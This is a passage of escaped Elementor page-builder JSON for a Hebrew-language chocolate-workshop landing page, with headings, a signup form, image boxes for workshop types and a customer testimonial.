\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd?<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05e6\\u05e8\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05e8\\u05d2\\u05e2\\u05d9\\u05dd \\u05d4\\u05d0\\u05dc\\u05d4, \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05d4\\u05d2\\u05d9\\u05e2 \\\"\\u05db\\u05de\\u05e2\\u05d8 \\u05e9\\u05d1\\u05e2\\u05d9\\u05dd\\\" \\u05d5\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05e9\\u05e1\\u05d5\\u05d1\\u05d1\\u05d9\\u05dd \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1 \\u05e2\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d4\\u05d7\\u05dc \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05d6\\u05dc, \\u05d4\\u05db\\u05dc \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05dc\\u05de\\u05d3\\u05d9 \\u05d1\\u05db\\u05dc \\u05e6\\u05d5\\u05e8\\u05d4 \\u05d5\\u05e6\\u05d1\\u05e2, \\u05db\\u05dc \\u05d3\\u05e8\\u05da \\u05d5\\u05e9\\u05e2\\u05d4.\\u00a0<\\/p>\",\"text_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1.6\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"17\"},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"15f91cbb\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"44.298\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_position\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"385ae28\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/inner-hp.jpg\",\"id\":26}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4477cb\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"25\",\"bottom\":\"50\",\"left\":\"25\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"20\",\"bottom\":\"60\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"702ee38f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"60600fc4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":24,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/michael-browning-188999.png\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"50\"},\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":28},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"bold\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\